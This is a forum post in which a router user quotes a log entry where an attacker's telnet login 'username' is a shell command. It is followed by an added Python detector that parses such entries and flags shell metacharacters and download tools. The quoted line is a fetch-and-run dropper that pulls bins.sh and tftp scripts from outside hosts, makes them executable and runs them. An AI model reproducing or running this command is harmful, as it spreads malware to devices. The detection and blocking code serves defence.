We just saw this in one of our routers' logs:
Looks like someone's trying to inject malicious code via username. I wouldn't get excited, but the fact that the beginning of the second message looks truncated hints that the injection could actually work. If it was checked in wrongly quoted bash, well, we'd be seriously fucked up.
Code:
system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.8.131.52/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 184.108.40.206 via telnet system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 220.127.116.11; chmod 777 tftp2.sh; sh tftp2.sh; rm from 18.104.22.168 via telnet
Could anyone from Mikrotik please reliably investigate/acknowledge/deny the possibility of this type of code injection? Version is quite recent (6.32.2). If the injection wasn't possible, I highly doubt the scriptkids would even care to send such logins...
Thanks in advance,
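As an added example (not from the post or from MikroTik), here is a small detector that pulls the "login failure for user ... from ... via ..." entries out of RouterOS log text, including the two messages that got run together in the line above, and flags usernames containing shell metacharacters or download/execute commands. The log sample is constructed from the posted line plus one benign entry; the regexes are assumptions, not a MikroTik log specification.

```python
import re

# Constructed sample: one ordinary failed login, then the post's line in which
# two log messages were emitted interleaved (so one line holds two entries).
SAMPLE_LOG = [
    "system,error,critical login failure for user admin from 192.0.2.10 via ssh",
    "system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt "
    "|| cd /root || cd /; wget http://188.8.131.52/bins.sh; chmod 777 bins.sh; "
    "sh bins.sh; tftp 208 from 184.108.40.206 via telnet system,error,critical "
    "login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; "
    "sh tftp1.sh; tftp -r tftp2.sh -g 220.127.116.11; chmod 777 tftp2.sh; "
    "sh tftp2.sh; rm from 18.104.22.168 via telnet",
]

# One entry = "login failure for user <user> from <ipv4> via <service>".
# The lazy <user> group stops at the first " from <ipv4> via", so several
# entries run together on one line are still split correctly by finditer().
ENTRY_RE = re.compile(
    r"login failure for user (?P<user>.*?) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) via (?P<svc>\w+)"
)

# Characters and commands that have no business in a username: command
# separators, redirection, substitution, and typical fetch-and-run tooling.
SHELL_META = re.compile(r"[;|&`$<>]|\b(?:wget|curl|tftp|chmod|sh|rm)\b")


def parse_entries(lines):
    """Return a list of {user, src, svc} dicts for every login-failure entry."""
    entries = []
    for line in lines:
        for m in ENTRY_RE.finditer(line):
            entries.append(m.groupdict())
    return entries


def suspicious_logins(lines):
    """Entries whose username looks like an injected shell command."""
    return [e for e in parse_entries(lines) if SHELL_META.search(e["user"])]


def sources_to_block(lines):
    """Distinct source IPs that sent injection-style usernames, for firewalling."""
    return sorted({e["src"] for e in suspicious_logins(lines)})


if __name__ == "__main__":
    for e in suspicious_logins(SAMPLE_LOG):
        print(f"{e['src']} via {e['svc']}: {e['user'][:60]!r}")
    print("block:", sources_to_block(SAMPLE_LOG))
```

The parser recovers three entries from the two sample lines and flags the two telnet ones; the benign ssh attempt with user "admin" is left alone.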